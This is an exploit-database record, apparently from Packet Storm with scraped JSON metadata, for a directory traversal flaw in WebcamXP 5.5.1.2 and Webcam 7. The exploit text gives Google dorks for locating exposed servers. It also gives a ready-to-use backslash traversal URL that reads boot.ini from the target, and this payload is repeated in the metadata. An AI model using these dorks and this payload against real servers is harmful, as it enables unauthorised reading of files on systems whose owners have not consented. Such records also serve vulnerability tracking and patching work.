ID PACKETSTORM:110093
Type packetstorm
Reporter Silent Dream
Modified 2012-02-23T00:00:00
Description
`# Exploit Title: WebcamXP and Webcam7 Directory Traversal Vulnerability
# Google Dork: "powered by webcamxp" xhtml css
# Google Dork: "powered by webcam 7"
# Date: 2/22/2012
# Author: Silent Dream
# Software Link: http://dl.filekicker.com/send/file/230775-FQAC/wlite550.exe
# Software Link: http://dl.filekicker.com/send/file/226161-G6BD/w7inst.exe
# Version: WebcamXP 5.5.1.2, Webcam 7 v0.9.9.32
# Tested on: Windows XP
# Similar to CVE: 2008-5862 but uses backslashes instead of encoded forward slashes.
http://ip:8080/..\..\..\..\..\..\..\..\..\..\..\boot.ini
`
{"hash": "d660bbc019f958fb74cce9ff2a44185aa91066e41717938b93553a1c508c6c1f", "sourceHref": "https://packetstormsecurity.com/files/download/110093/webcamxp7-traversal.txt", "title": "WebcamXP / Webcam7 Directory Traversal", "id": "PACKETSTORM:110093", "published": "2012-02-23T00:00:00", "description": "", "modified": "2012-02-23T00:00:00", "sourceData": "`# Exploit Title: WebcamXP and Webcam7 Directory Traversal Vulnerability \n# Google Dork: \"powered by webcamxp\" xhtml css \n# Google Dork: \"powered by webcam 7\" \n# Date: 2/22/2012 \n# Author: Silent Dream \n# Software Link: http://dl.filekicker.com/send/file/230775-FQAC/wlite550.exe \n# Software Link: http://dl.filekicker.com/send/file/226161-G6BD/w7inst.exe \n# Version: WebcamXP 5.5.1.2, Webcam 7 v0.9.9.32 \n# Tested on: Windows XP \n# Similar to CVE: 2008-5862 but uses backslashes instead of encoded forward slashes. \nhttp://ip:8080/..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\boot.ini \n \n \n`\n", "reporter": "Silent Dream", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "d3f0e19b08712e8cf1243f73c15d761a"}, {"key": "modified", "hash": "ba3c5ef3989f187163fb4e9d886ed1f2"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "ba3c5ef3989f187163fb4e9d886ed1f2"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "570298f2151da5c0c58d234d1f404b2c"}, {"key": "sourceData", "hash": "87290fd0d62d02586b9630da642e3703"}, {"key": "sourceHref", "hash": "431bec6bfc95cfb00fa12f486a9f7c07"}, {"key": "title", "hash": "5ac9afe359c45f4bcbe440d26582a9c0"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "cvss": {"vector": "NONE", "score": 0.0}, "references": [], "type": "packetstorm", "cvelist": [], "history": [], "bulletinFamily": "exploit", "objectVersion": "1.2", "edition": 1, "href": "https://packetstormsecurity.com/files/110093/WebcamXP-Webcam7-Directory-Traversal.html", "lastseen": "2016-11-03T10:22:08", "viewCount": 0, "enchantments": {"vulnersScore": 4.0}}
{"result": {}}